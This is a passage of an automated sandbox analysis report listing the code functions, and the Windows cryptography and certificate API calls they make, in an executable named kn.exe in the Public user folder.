                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED37A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEEB794 CryptExportPublicKeyInfoEx,SetLastError,25_2_00007FF67DEEB794
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,25_2_00007FF67DE4B788
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,25_2_00007FF67DE6D790
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA577C #360,#358,CryptDecodeObject,GetLastError,#357,25_2_00007FF67DEA577C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,25_2_00007FF67DE9F774
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED5768
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,25_2_00007FF67DEFD750
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,25_2_00007FF67DE6B324
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,25_2_00007FF67DEBD30C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE6D304
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DECF2F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,25_2_00007FF67DEA92D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,25_2_00007FF67DEB32D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DF093A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE992C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,25_2_00007FF67DE992C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,25_2_00007FF67DE9B2B4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,25_2_00007FF67DED32A8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07290 NCryptIsKeyHandle,#359,#360,#357,#358,25_2_00007FF67DF07290
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,25_2_00007FF67DEFD28C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6D240 #357,CryptFindOIDInfo,#357,LocalFree,25_2_00007FF67DE6D240
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,25_2_00007FF67DF07214
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF071C8 BCryptDestroyKey,#360,25_2_00007FF67DF071C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,25_2_00007FF67DED11C8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,25_2_00007FF67DED31C0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEA51A4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,25_2_00007FF67DEB3188
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF07178 BCryptCloseAlgorithmProvider,#360,25_2_00007FF67DF07178
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,25_2_00007FF67DEBF168
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,25_2_00007FF67DEB5164
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE93504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,25_2_00007FF67DE93504
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,25_2_00007FF67DED34F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF014F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,25_2_00007FF67DF014F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEEB4EC CryptDecodeObjectEx,SetLastError,25_2_00007FF67DEEB4EC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFF4A0 CryptHashPublicKeyInfo,SetLastError,25_2_00007FF67DEFF4A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,25_2_00007FF67DEBF488
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED9480
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF29208 #357,NCryptEnumKeys,#360,#358,25_2_00007FF67DF29208
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEEB464 CryptEncodeObjectEx,SetLastError,25_2_00007FF67DEEB464
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE35438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,25_2_00007FF67DE35438
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED342C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,25_2_00007FF67DF0141C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE913F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,25_2_00007FF67DE913F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB53E8 CryptEncodeObjectEx,GetLastError,#357,25_2_00007FF67DEB53E8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,25_2_00007FF67DEBB3D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,25_2_00007FF67DEE33B0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,25_2_00007FF67DEB33A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,25_2_00007FF67DF0739C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,25_2_00007FF67DED3390
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,25_2_00007FF67DE5B36C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,25_2_00007FF67DE8B350
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE95338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DE95338
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE67340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,25_2_00007FF67DE67340
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06F2C NCryptExportKey,#360,25_2_00007FF67DF06F2C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE68F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,25_2_00007FF67DE68F1C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0EF4 NCryptImportKey,#205,#359,#359,#357,25_2_00007FF67DED0EF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06EA8 NCryptImportKey,#360,25_2_00007FF67DF06EA8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFEE94 CryptSignMessage,SetLastError,25_2_00007FF67DEFEE94
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE70E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,25_2_00007FF67DE70E94
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,25_2_00007FF67DEA2E7C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,25_2_00007FF67DED2E6C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06E48 NCryptSetProperty,#360,25_2_00007FF67DF06E48
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE60E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE60E24
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06DE0 NCryptCreatePersistedKey,#360,25_2_00007FF67DF06DE0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,25_2_00007FF67DEB4DDC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,25_2_00007FF67DED0DD4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,25_2_00007FF67DEF8DD0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF02DAC #357,#357,CryptFindOIDInfo,LocalFree,25_2_00007FF67DF02DAC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0D84 NCryptFreeObject,#205,#357,25_2_00007FF67DED0D84
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06D78 NCryptOpenKey,#360,25_2_00007FF67DF06D78
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,25_2_00007FF67DED2D78
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE89134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,25_2_00007FF67DE89134
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF07124 BCryptGenerateKeyPair,#360,25_2_00007FF67DF07124
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,25_2_00007FF67DEF511C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED10D8 NCryptSetProperty,#205,#359,#357,#359,#357,25_2_00007FF67DED10D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,25_2_00007FF67DED30D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF070C8 BCryptSetProperty,#360,25_2_00007FF67DF070C8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF20DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,25_2_00007FF67DF20DB8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEDB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DEDB0A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,25_2_00007FF67DE9B098
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,25_2_00007FF67DE7107C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0705C BCryptGetProperty,#360,25_2_00007FF67DF0705C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED1058 NCryptOpenStorageProvider,#205,#359,#357,25_2_00007FF67DED1058
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,25_2_00007FF67DE4302F
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE47034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,25_2_00007FF67DE47034
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,25_2_00007FF67DEC9028
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED7020
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED301C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF14E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,25_2_00007FF67DF14E58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0700C BCryptEnumAlgorithms,#360,25_2_00007FF67DF0700C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0FB4 NCryptOpenKey,#205,#359,#357,#357,25_2_00007FF67DED0FB4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06FAC BCryptOpenAlgorithmProvider,#360,25_2_00007FF67DF06FAC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF30ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,25_2_00007FF67DF30ED0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE64F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,25_2_00007FF67DE64F90
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEFEF74
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,25_2_00007FF67DEC0F58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,25_2_00007FF67DEB4F50
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,25_2_00007FF67DF3EB38
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,25_2_00007FF67DEC8AFC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE72B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,25_2_00007FF67DE72B00
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,25_2_00007FF67DED2AE4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,25_2_00007FF67DED0ABC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED8AA0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF02A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,25_2_00007FF67DF02A78
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE46A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,25_2_00007FF67DE46A84
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,25_2_00007FF67DEBEA7C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,25_2_00007FF67DEB4A34
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,25_2_00007FF67DED4A1C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0A18 BCryptSetProperty,#205,#359,#357,#357,25_2_00007FF67DED0A18
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF08C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,25_2_00007FF67DF08C58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,25_2_00007FF67DEBAA00
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,25_2_00007FF67DE9E9F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF14C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,25_2_00007FF67DF14C80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,25_2_00007FF67DE929A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED099C BCryptOpenAlgorithmProvider,#205,#359,#359,25_2_00007FF67DED099C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF02994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,25_2_00007FF67DF02994
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF28CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,25_2_00007FF67DF28CF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,25_2_00007FF67DE5C960
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED8940
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEDC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,25_2_00007FF67DEDC940
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06D2C NCryptFreeBuffer,#360,25_2_00007FF67DF06D2C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE92D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DE92D18
